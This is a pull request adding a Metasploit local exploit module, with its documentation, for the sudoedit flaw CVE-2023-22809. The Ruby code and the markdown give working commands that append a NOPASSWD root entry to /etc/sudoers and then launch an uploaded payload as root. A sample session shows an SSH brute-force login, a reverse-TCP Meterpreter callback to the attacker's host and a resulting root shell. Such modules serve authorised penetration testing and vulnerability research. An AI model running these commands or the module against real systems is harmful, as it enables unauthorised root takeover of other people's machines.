### PR TITLE
Linux sudoedit priv esc (CVE-2023-22809)

### DIFF
--- a/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md
@@ -7,12 +7,11 @@ append arbitrary entries to the list of files to process. This can lead to privi
 by appending extra entries on /etc/sudoers allowing for execution of an arbitrary payload with root
 privileges.
 
-Affected versions are 1.8.0 through 1.9.12.p1.
+Affected versions are 1.8.0 through 1.9.12.p1. However THIS module only works against Ubuntu
+22.04 and 22.10.
 
-The check method for this module will only work with Debian based systems. However,
-many *nix based systems should be vulnerable.
-
-This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04
+This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04, and
+1.9.11p3-1ubuntu1 on Ubuntu 22.10.
 
 ### Exploit Breakdown
 
@@ -30,23 +29,34 @@ Next we execute out payload, launching it through our shell.
 Many of the PoCs work via user input where you have to manually edit `/etc/sudoers`. Obviously this strategy
 won't work with Metasploit, as we need to automate it. Early attempts tried to script `vi` into performing
 the write and quite command, similar to:
-`EDITOR="vi -c ':$' -c ':s/$/\\ruser ALL=(ALL:ALL) ALL/' -c ':wq'  -c ':q' -- /etc/sudoers" sudo -e /etc/motd`
+```EDITOR="vi -c ':$' -c ':s/$/\\r`whoami` ALL=(ALL:ALL) ALL/' -c ':wq'  -c ':q' -- /etc/sudoers" sudo -e /etc/motd```
 However, the command didn't do well with newlines and escaping.
 
 `sed` however is a valid editor, so it was relatively trivial to script out adding the new entry via sed:
 ```EDITOR="sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: ALL' -- /etc/sudoers" sudo -e /etc/motd```
 
-#### Fedora 21
+#### Results from other OSes
+
+Most of the errors are similar to:
 
 ```
-[*] Executing command: EDITOR="sed -i -e '$ a fedora ALL=(ALL:ALL) NOPASSWD: /bin/sh # ZMoAqOkBfR9e' -- /etc/sudoers" sudo -S -e /etc/passwd
+[*] Executing command: EDITOR="sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: /bin/sh # 2Iq0tUAqsqtn' -- /etc/sudoers" sudo -S -e /etc/motd
+[*] sudo: --: editing files in a writable directory is not permitted
 [*] sed: -e expression #1, char 1: unknown command: `''
 ```
 
-
 ### Install
 
-On Ubuntu 22.04:
+#### On Ubuntu 22.10:
+
+```
+https://mirrors.wikimedia.org/ubuntu/ubuntu/pool/main/s/sudo/sudo_1.9.11p3-1ubuntu1_amd64.deb
+sudo dpkg -i sudo_1.9.11p3-1ubuntu1_amd64.deb
+```
+
+Follow the 22.04 instructions, after installing the deb package, to configure the host.
+
+#### On Ubuntu 22.04:
 
 ```
 wget http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.9.9-1ubuntu2_amd64.deb
@@ -89,6 +99,10 @@ if auto detection fails.
 ### SHELL
 
 Which shell to use. Defaults to `/bin/sh`
+
+### TIMEOUT
+
+The amount of time to wait for a `sudo` command to respond. Defaults to `5`.
 
 
 ## Scenarios

--- a/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md
@@ -28,13 +28,21 @@ We also add a flag at the end of our entry after a `#` (comment) for ease of era
 Next we execute out payload, launching it through our shell.
 
 Many of the PoCs work via user input where you have to manually edit `/etc/sudoers`. Obviously this strategy
-won't work with metasploit, as we need to automate it. Early attempts tried to script `vi` into performing
+won't work with Metasploit, as we need to automate it. Early attempts tried to script `vi` into performing
 the write and quite command, similar to:
 `EDITOR="vi -c ':$' -c ':s/$/\\ruser ALL=(ALL:ALL) ALL/' -c ':wq'  -c ':q' -- /etc/sudoers" sudo -e /etc/motd`
 However, the command didn't do well with newlines and escaping.
 
 `sed` however is a valid editor, so it was relatively trivial to script out adding the new entry via sed:
 ```EDITOR="sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: ALL' -- /etc/sudoers" sudo -e /etc/motd```
+
+#### Fedora 21
+
+```
+[*] Executing command: EDITOR="sed -i -e '$ a fedora ALL=(ALL:ALL) NOPASSWD: /bin/sh # ZMoAqOkBfR9e' -- /etc/sudoers" sudo -S -e /etc/passwd
+[*] sed: -e expression #1, char 1: unknown command: `''
+```
+
 
 ### Install
 

--- a/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md
@@ -1,0 +1,140 @@
+## Vulnerable Application
+
+This exploit takes advantage of a vulnerability in sudoedit, part of the sudo package.
+The sudoedit (aka sudo -e) feature mishandles extra arguments passed in the user-provided
+environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to
+append arbitrary entries to the list of files to process. This can lead to privilege escalation.
+by appending extra entries on /etc/sudoers allowing for execution of an arbitrary payload with root
+privileges.
+
+Affected versions are 1.8.0 through 1.9.12.p1.
+
+The check method for this module will only work with Debian based systems. However,
+many *nix based systems should be vulnerable.
+
+This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04
+
+### Exploit Breakdown
+
+This exploit works by first identifying what file can be edited via `sudo -l`.  The `-S` flag
+is also required or sudo may complain about not being in a proper tty environment, so `-S` specifies
+to allow password input via stdin (although we never provide a password).
+
+Next we make a new entry in `/etc/sudoers`.  In theory we could specify something similar to `"$USER ALL=(ALL:ALL) ALL"`
+which many of the PoCs do, however we can be more surgical.  In this case, we don't specify the payload as most
+Metasploit exploits would, but actually a shell (`/bin/sh` by default), as `sudo` doesn't play well with `&`.
+We also add a flag at the end of our entry after a `#` (comment) for ease of erasing later.
+
+Next we execute out payload, launching it through our shell.
+
+Many of the PoCs work via user input where you have to manually edit `/etc/sudoers`. Obviously this strategy
+won't work with metasploit, as we need to automate it. Early attempts tried to script `vi` into performing
+the write and quite command, similar to:
+`EDITOR="vi -c ':$' -c ':s/$/\\ruser ALL=(ALL:ALL) ALL/' -c ':wq'  -c ':q' -- /etc/sudoers" sudo -e /etc/motd`
+However, the command didn't do well with newlines and escaping.
+
+`sed` however is a valid editor, so it was relatively trivial to script out adding the new entry via sed:
+```EDITOR="sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: ALL' -- /etc/sudoers" sudo -e /etc/motd```
+
+### Install
+
+On Ubuntu 22.04:
+
+```
+wget http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.9.9-1ubuntu2_amd64.deb
+sudo dpkg -i sudo_1.9.9-1ubuntu2_amd64.deb
+```
+
+Now add an entry to `/etc/sudoers` for an editable file, in this case we use `/etc/motd`.
+Change 'user' for whatever user you want to be able to exploit this:
+
+```
+user ALL=(root) NOPASSWD: sudoedit /etc/motd
+```
+
+Now test this by running `sudo -l` and you should see:
+
+```
+User <user> may run the following commands on <system>:
+    (ALL : ALL) ALL
+    (root) NOPASSWD: sudoedit /etc/motd
+```
+
+Noting the entry at the bottom to `/etc/motd`
+
+## Verification Steps
+
+1. Install the application
+2. Get an initial shell
+3. Do: `use exploit/linux/local/sudoedit_bypass_priv_esc`
+4. Do: `set session [session]`
+5. Do: `run`
+6. You should get a root shell.
+
+## Options
+
+### EDITABLEFILE
+
+The file which can be edited via `sudoedit`. An attempt to auto detect this is made, so it is only required
+if auto detection fails.
+
+### SHELL
+
+Which shell to use. Defaults to `/bin/sh`
+
+
+## Scenarios
+
+### Sudo 1.9.9-1ubuntu2 on Ubuntu 22.04
+
+```
+[*] Processing sudoedit.rb for ERB directives.
+resource (sudoedit.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (sudoedit.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (sudoedit.rb)> set username ubuntu
+username => ubuntu
+resource (sudoedit.rb)> set password ubuntu
+password => ubuntu
+resource (sudoedit.rb)> run
+[*] 1.1.1.1:22 - Starting bruteforce
+[+] 1.1.1.1:22 - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd) Linux ubuntu2204 5.15.0-48-generic #54-Ubuntu SMP Fri Aug 26 13:26:29 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux '
+[*] SSH session 1 opened (2.2.2.2:46613 -> 1.1.1.1:22) at 2023-04-25 18:46:03 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (sudoedit.rb)> use exploit/linux/local/sudoedit_bypass_priv_esc
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+resource (sudoedit.rb)> set session 1
+session => 1
+resource (sudoedit.rb)> set verbose true
+verbose => true
+resource (sudoedit.rb)> exploit
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session architecture: 
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] sudo version 1.9.9.pre.1ubuntu2 is vulnerable
+[+] The target is vulnerable. Sudo 1.9.9.pre.1ubuntu2 is vulnerable, can edit: /etc/motd
+[*] Writing '/tmp/.LImVy' (250 bytes) ...
+[*] Max line length is 65537
+[*] Writing 250 bytes in 1 chunks of 735 bytes (octal-encoded), using printf
+[*] Adding user to sudoers
+[*] Executing command: EDITOR="sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: /bin/sh # SbccIOwAiK1i' -- /etc/sudoers" sudo -S -e /etc/motd
+[+] Likely successful exploitation, detected possitive error message: editing files in a writable directory is not permitted
+[*] sudo: --: editing files in a writable directory is not permitted
+[*] Spawning payload
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045348 bytes) to 1.1.1.1
+[-] Manual cleanup is likely required, please run: sed -i '/# SbccIOwAiK1i/d' /etc/sudoers
+[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:57426) at 2023-04-25 18:46:25 -0400
+
+(Meterpreter 2)(/home/ubuntu) > getuid
+Server username: root
+(Meterpreter 2)(/home/ubuntu) > sysinfo
+Computer     : 1.1.1.1
+OS           : Ubuntu 22.04 (Linux 5.15.0-48-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+(Meterpreter 2)(/home/ubuntu) > 
+```

--- a/modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
+++ b/modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
@@ -26,12 +26,11 @@ class MetasploitModule < Msf::Exploit::Local
           by appending extra entries on /etc/sudoers allowing for execution of an arbitrary payload with root
           privileges.
 
-          Affected versions are 1.8.0 through 1.9.12.p1.
+          Affected versions are 1.8.0 through 1.9.12.p1. However THIS module only works against Ubuntu
+          22.04 and 22.10.
 
-          The check method for this module will only work with Debian based systems. However,
-          many *nix based systems should be vulnerable.
-
-          This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04
+          This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04, and
+          1.9.11p3-1ubuntu1 on Ubuntu 22.10.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -66,8 +65,13 @@ class MetasploitModule < Msf::Exploit::Local
     register_advanced_options [
       OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
       OptString.new('EDITABLEFILE', [ false, 'A file which can be edited with sudo -e or sudoedit' ]),
-      OptString.new('SHELL', [ true, 'A shell we can launch our payload from. Bash or SH should be safe', '/bin/sh' ])
+      OptString.new('SHELL', [ true, 'A shell we can launch our payload from. Bash or SH should be safe', '/bin/sh' ]),
+      OptInt.new('TIMEOUT', [true, 'The timeout waiting for sudo commands to respond', 10]),
     ]
+  end
+
+  def timeout
+    datastore['TIMEOUT']
   end
 
   # Simplify pulling the writable directory variable
@@ -90,40 +94,60 @@ class MetasploitModule < Msf::Exploit::Local
     editable_file
   end
 
+  def get_sudo_version_from_sudo
+    package = cmd_exec('sudo --version')
+    package = package.split(' ')[2] # Sudo version XXX
+    begin
+      Rex::Version.new(package)
+    rescue ArgumentError
+      # this happens on systems like debian 8.7.1 which doesn't have sudo
+      Rex::Version.new(0)
+    end
+  end
+
   def check
     sys_info = get_sysinfo
 
     # Check the app is installed and the version
-    if sys_info['distro'] == 'ubuntu' || sys_info['distro'] == 'debian'
+    if sys_info[:distro] == 'ubuntu' || sys_info[:distro] == 'debian'
       package = cmd_exec('dpkg -l sudo | grep \'^ii\'')
-      package = package.split(' ')[2] # ii, package name, version, arch for debian, or Sudo version XXX for other
-      ver_no = Rex::Version.new(package)
+      package = package.split(' ')[2] # ii, package name, version, arch
+      begin
+        ver_no = Rex::Version.new(package)
+      rescue ArgumentError
+        ver_no = get_sudo_version_from_sudo
+      end
     else
-      package = cmd_exec('sudo --version')
-      package = package.split(' ')[2] # ii, package name, version, arch for debian, or Sudo version XXX for other
-      ver_no = Rex::Version.new(package)
+      ver_no = get_sudo_version_from_sudo
     end
 
     # according to CVE listing, but so much backporting...
     minimal_version = '1.8.0'
     maximum_version = '1.9.12p1'
+    exploitable = false
 
     # backporting... so annoying.
     # https://ubuntu.com/security/CVE-2023-22809
-    if sys_info['distro'] == 'ubuntu'
-      if sys_info['version'].include? '22.10' # kinetic
+    if sys_info[:distro] == 'ubuntu'
+      if sys_info[:version].include? '22.10' # kinetic
+        exploitable = true
         maximum_version = '1.9.11p3-1ubuntu1.1'
-      elsif sys_info['version'].include? '22.04' # jammy
+      elsif sys_info[:version].include? '22.04' # jammy
+        exploitable = true
         maximum_version = '1.9.9-1ubuntu2.2'
-      elsif sys_info['version'].include? '20.04' # focal
+      elsif sys_info[:version].include? '20.04' # focal
         maximum_version = '1.8.31-1ubuntu1.4'
-      elsif sys_info['version'].include? '18.04' # bionic
+      elsif sys_info[:version].include? '18.04' # bionic
         maximum_version = '1.8.21p2-3ubuntu1.5'
-      elsif sys_info['version'].include? '16.04'  # xenial
+      elsif sys_info[:version].include? '16.04'  # xenial
         maximum_version = '1.8.16-0ubuntu1.10+esm1'
-      elsif sys_info['version'].include? '14.04'  # trusty
+      elsif sys_info[:version].include? '14.04'  # trusty
         maximum_version = '1.8.9p5-1ubuntu1.5+esm7'
       end
+    end
+
+    if ver_no == Rex::Version.new(0)
+      return Exploit::CheckCode::Unknown('Unable to detect sudo version')
     end
 
     if ver_no < Rex::Version.new(maximum_version) && ver_no >= Rex::Version.new(minimal_version)
@@ -131,9 +155,15 @@ class MetasploitModule < Msf::Exploit::Local
       # check if theres an entry in /etc/sudoers that allows us to edit a file
       editable_file = get_editable_file
       if editable_file.nil?
-        return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. Please set EDITABLEFILE option manually")
-      else
+        if exploitable
+          return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. Please set EDITABLEFILE option manually")
+        else
+          return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module")
+        end
+      elsif exploitable
         return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}")
+      else
+        return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}. OS can NOT be exploitabed by this module")
       end
     end
 
@@ -160,7 +190,6 @@ class MetasploitModule < Msf::Exploit::Local
     upload_and_chmodx payload_path, generate_payload_exe
     register_file_for_cleanup(payload_path)
 
-    timeout = 5 # anything more than this we're stuck at a 'enter password' prompt
     @flag = Rex::Text.rand_text_alphanumeric(12)
     print_status 'Adding user to sudoers'
     # we tack on a flag so we can easily grep for this line and clean it up later
@@ -168,14 +197,17 @@ class MetasploitModule < Msf::Exploit::Local
     vprint_status("Executing command: #{command}")
 
     output = cmd_exec command, nil, timeout
-    if output.include? 'editing files in a writable directory is not permitted'
-      print_good('Likely successful exploitation, detected possitive error message: editing files in a writable directory is not permitted')
+    if output.include? '/etc/sudoers unchanged'
+      fail_with(Failure::NoTarget, 'Failed to edit sudoers, command was unsuccessful')
     end
+
+    if output.include? 'sudo: ignoring editor'
+      fail_with(Failure::NotVulnerable, 'sudo is patched')
+    end
+
     output.each_line { |line| vprint_status line.chomp }
     print_status('Spawning payload')
 
-    timeout = 60
-    # output = cmd_exec "sudo -S nohup #{@payload_path} &", nil, timeout
     # -S may not be needed here, but if exploitation didn't go well, we dont want to bork our shell
     # also, attempting to thread off of sudo was problematic, solution was
     # https://askubuntu.com/questions/1110865/how-can-i-run-detached-command-with-sudo-over-ssh
@@ -186,9 +218,11 @@ class MetasploitModule < Msf::Exploit::Local
 
   def on_new_session(session)
     if @flag
-      print_bad("Manual cleanup is likely required, please run: sed -i '/\# #{@flag}/d' /etc/sudoers")
-      # attempt anyways, but likely doesn't work
       session.shell_command_token("sed -i '/\# #{@flag}/d' /etc/sudoers")
+      flag_found = session.shell_command_token("grep '#{@flag}' /etc/sudoers")
+      if flag_found.include? @flag
+        print_bad("Manual cleanup is required, please run: sed -i '/\# #{@flag}/d' /etc/sudoers")
+      end
     end
     super
   end

--- a/modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
+++ b/modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
@@ -1,0 +1,177 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Sudoedit Extra Arguments Priv Esc',
+        'Description' => %q{
+          This exploit module illustrates how a vulnerability could be exploited
+          in an linux command for priv esc.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Matthieu Barjole', # original PoC, analysis
+          'Victor Cutillas' # original PoC, analysis
+        ],
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [
+          [ 'EDB', '51217' ],
+          [ 'URL', 'https://github.com/M4fiaB0y/CVE-2023-22809/blob/main/exploit.sh' ],
+          [ 'URL', 'https://raw.githubusercontent.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc/main/exploit.sh' ],
+          [ 'URL', 'https://www.vicarius.io/vsociety/blog/cve-2023-22809-sudoedit-bypass-analysis' ],
+          [ 'URL', 'https://medium.com/@dev.nest/how-to-bypass-sudo-exploit-cve-2023-22809-vulnerability-296ef10a1466' ],
+          [ 'URL', 'https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf' ],
+          [ 'URL', 'https://www.sudo.ws/security/advisories/sudoedit_any/'],
+          [ 'CVE', '2023-22809' ]
+        ],
+        'DisclosureDate' => '2023-01-18',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+      OptString.new('EDITABLEFILE', [ false, 'A file which can be edited with sudo -e or sudoedit' ]),
+      OptString.new('shell', [ true, 'A shell we can launch our payload from. Bash or SH should be safe', '/bin/sh' ])
+    ]
+  end
+
+  # Simplify pulling the writable directory variable
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def get_editable_file
+    vprint_status("Using user defined EDITABLEFILE: #{datastore['EDITABLEFILE']}") if datastore['EDITABLEFILE']
+    return datastore['EDITABLEFILE'] if datastore['EDITABLEFILE']
+
+    # we do a rev here to reverse the order since we only want the last entry, take item 1, then rev it back so its normal. this seemed to
+    # be the easiest way to do a cut -f -1 (negative one). https://stackoverflow.com/questions/22727107/how-to-find-the-last-field-using-cut
+    editable_file = cmd_exec('sudo -l -S | grep -E "sudoedit|sudo -e" | grep -E "(root)" | rev | cut -d " " -f 1 | rev')
+    editable_file = editable_file.strip
+    if editable_file.include?('a terminal is required to read the password') || editable_file.nil? || editable_file.empty?
+      return nil
+    end
+
+    editable_file
+  end
+
+  def check
+    # Check the app is installed and the version
+    package = cmd_exec('dpkg -l sudo | grep \'^ii\'')
+    package = package.split(' ')[2] # ii, package name, version, arch
+    sys_info = get_sysinfo
+    ver_no = Rex::Version.new(package)
+
+    # according to CVE listing, but so much backporting...
+    minimal_version = '1.8.0'
+    maximum_version = '1.9.12p1'
+
+    # backporting... so annoying.
+    # https://ubuntu.com/security/CVE-2023-22809
+    if sys_info['distro'] == 'ubuntu'
+      if sys_info['version'].include? '22.10' # kinetic
+        maximum_version = '1.9.11p3-1ubuntu1.1'
+      elsif sys_info['version'].include? '22.04' # jammy
+        maximum_version = '1.9.9-1ubuntu2.2'
+      elsif sys_info['version'].include? '20.04' # focal
+        maximum_version = '1.8.31-1ubuntu1.4'
+      elsif sys_info['version'].include? '18.04' # bionic
+        maximum_version = '1.8.21p2-3ubuntu1.5'
+      elsif sys_info['version'].include? '16.04'  # xenial
+        maximum_version = '1.8.16-0ubuntu1.10+esm1'
+      elsif sys_info['version'].include? '14.04'  # trusty
+        maximum_version = '1.8.9p5-1ubuntu1.5+esm7'
+      end
+    end
+
+    if ver_no < Rex::Version.new(maximum_version) && ver_no >= Rex::Version.new(minimal_version)
+      vprint_good("sudo version #{ver_no} is vulnerable")
+      # check if theres an entry in /etc/sudoers that allows us to edit a file
+      editable_file = get_editable_file
+      if editable_file.nil?
+        return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. Please set EDITABLEFILE option manually")
+      else
+        return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}")
+      end
+    end
+
+    CheckCode::Safe("sudo version #{ver_no} may NOT be vulnerable")
+  end
+
+  def exploit
+    # Check if we're already root
+    if !datastore['ForceExploit'] && is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+    end
+
+    if get_editable_file.nil?
+      fail_with Failure::BadConfig, 'Unable to automatically detect sudo editable file, EDITABLEFILE option is required'
+    end
+
+    # Make sure we can write our exploit and payload to the local system
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_file_for_cleanup(payload_path)
+
+    timeout = 5 # anything more than this we're stuck at a 'enter password' prompt
+    @flag = Rex::Text.rand_text_alphanumeric(12)
+    print_status 'Adding user to sudoers'
+    # we tack on a flag so we can easily grep for this line and clean it up later
+    command = "EDITOR=\"sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: /bin/sh \# #{@flag}' -- /etc/sudoers\" sudo -S -e #{get_editable_file}"
+    vprint_status("Executing command: #{command}")
+
+    output = cmd_exec command, nil, timeout
+    if output.include? 'editing files in a writable directory is not permitted'
+      print_good('Likely successful exploitation, detected possitive error message: editing files in a writable directory is not permitted')
+    end
+    output.each_line { |line| vprint_status line.chomp }
+    print_status('Spawning payload')
+
+    timeout = 60
+    # output = cmd_exec "sudo -S nohup #{@payload_path} &", nil, timeout
+    # -S may not be needed here, but if exploitation didn't go well, we dont want to bork our shell
+    # also, attempting to thread off of sudo was problematic, solution was
+    # https://askubuntu.com/questions/1110865/how-can-i-run-detached-command-with-sudo-over-ssh
+    # other refs that didn't work: https://askubuntu.com/questions/634620/when-using-and-sudo-on-the-first-command-is-the-second-command-run-as-sudo-t
+    output = cmd_exec "sudo -S -b sh -c 'nohup #{payload_path} > /dev/null 2>&1 &'", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+  end
+
+  def on_new_session(session)
+    if @flag
+      print_bad("Manual cleanup is likely required, please run: sed -i '/\# #{@flag}/d' /etc/sudoers")
+      # attempt anyways, but likely doesn't work
+      session.shell_command_token("sed -i '/\# #{@flag}/d' /etc/sudoers")
+    end
+    super
+  end
+end

--- a/modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
+++ b/modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
@@ -19,8 +19,19 @@ class MetasploitModule < Msf::Exploit::Local
         info,
         'Name' => 'Sudoedit Extra Arguments Priv Esc',
         'Description' => %q{
-          This exploit module illustrates how a vulnerability could be exploited
-          in an linux command for priv esc.
+          This exploit takes advantage of a vulnerability in sudoedit, part of the sudo package.
+          The sudoedit (aka sudo -e) feature mishandles extra arguments passed in the user-provided
+          environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to
+          append arbitrary entries to the list of files to process. This can lead to privilege escalation.
+          by appending extra entries on /etc/sudoers allowing for execution of an arbitrary payload with root
+          privileges.
+
+          Affected versions are 1.8.0 through 1.9.12.p1.
+
+          The check method for this module will only work with Debian based systems. However,
+          many *nix based systems should be vulnerable.
+
+          This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -55,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Local
     register_advanced_options [
       OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
       OptString.new('EDITABLEFILE', [ false, 'A file which can be edited with sudo -e or sudoedit' ]),
-      OptString.new('shell', [ true, 'A shell we can launch our payload from. Bash or SH should be safe', '/bin/sh' ])
+      OptString.new('SHELL', [ true, 'A shell we can launch our payload from. Bash or SH should be safe', '/bin/sh' ])
     ]
   end
 
@@ -146,7 +157,7 @@ class MetasploitModule < Msf::Exploit::Local
     @flag = Rex::Text.rand_text_alphanumeric(12)
     print_status 'Adding user to sudoers'
     # we tack on a flag so we can easily grep for this line and clean it up later
-    command = "EDITOR=\"sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: /bin/sh \# #{@flag}' -- /etc/sudoers\" sudo -S -e #{get_editable_file}"
+    command = "EDITOR=\"sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: #{datastore['SHELL']} \# #{@flag}' -- /etc/sudoers\" sudo -S -e #{get_editable_file}"
     vprint_status("Executing command: #{command}")
 
     output = cmd_exec command, nil, timeout

--- a/modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
+++ b/modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
@@ -91,11 +91,18 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    # Check the app is installed and the version
-    package = cmd_exec('dpkg -l sudo | grep \'^ii\'')
-    package = package.split(' ')[2] # ii, package name, version, arch
     sys_info = get_sysinfo
-    ver_no = Rex::Version.new(package)
+
+    # Check the app is installed and the version
+    if sys_info['distro'] == 'ubuntu' || sys_info['distro'] == 'debian'
+      package = cmd_exec('dpkg -l sudo | grep \'^ii\'')
+      package = package.split(' ')[2] # ii, package name, version, arch for debian, or Sudo version XXX for other
+      ver_no = Rex::Version.new(package)
+    else
+      package = cmd_exec('sudo --version')
+      package = package.split(' ')[2] # ii, package name, version, arch for debian, or Sudo version XXX for other
+      ver_no = Rex::Version.new(package)
+    end
 
     # according to CVE listing, but so much backporting...
     minimal_version = '1.8.0'
@@ -136,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Local
   def exploit
     # Check if we're already root
     if !datastore['ForceExploit'] && is_root?
-      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
     end
 
     if get_editable_file.nil?

--- a/modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
+++ b/modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
@@ -87,9 +87,9 @@ class MetasploitModule < Msf::Exploit::Local
       return datastore['EDITABLEFILE']
     end
 
-    # we do a rev here to reverse the order since we only want the last entry, take item 1, then rev it back so its normal. this seemed to
+    # we do a rev here to reverse the order since we only want the last entry (the file name), take item 1, then rev it back so its normal. this seemed to
     # be the easiest way to do a cut -f -1 (negative one). https://stackoverflow.com/questions/22727107/how-to-find-the-last-field-using-cut
-    editable_file = cmd_exec('sudo -l -S | grep -E "sudoedit|sudo -e" | grep -E "(root)" | rev | cut -d " " -f 1 | rev')
+    editable_file = cmd_exec('sudo -l -S | grep -E "sudoedit|sudo -e" | grep -E \'\\(root\\)|\\(ALL\\)|\\(ALL : ALL\\)\' | rev | cut -d " " -f 1 | rev')
     editable_file = editable_file.strip
     if editable_file.nil? || editable_file.empty? || editable_file.include?('a terminal is required to read the password') || editable_file.include?('password for')
       return nil

--- a/modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
+++ b/modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
@@ -80,16 +80,22 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def get_editable_file
-    vprint_status("Using user defined EDITABLEFILE: #{datastore['EDITABLEFILE']}") if datastore['EDITABLEFILE']
-    return datastore['EDITABLEFILE'] if datastore['EDITABLEFILE']
+    if datastore['EDITABLEFILE'].present?
+      fail_with(Failure::BadConfig, 'EDITABLEFILE must be a file.') unless file?(datastore['EDITABLEFILE'])
+
+      vprint_status("Using user defined EDITABLEFILE: #{datastore['EDITABLEFILE']}")
+      return datastore['EDITABLEFILE']
+    end
 
     # we do a rev here to reverse the order since we only want the last entry, take item 1, then rev it back so its normal. this seemed to
     # be the easiest way to do a cut -f -1 (negative one). https://stackoverflow.com/questions/22727107/how-to-find-the-last-field-using-cut
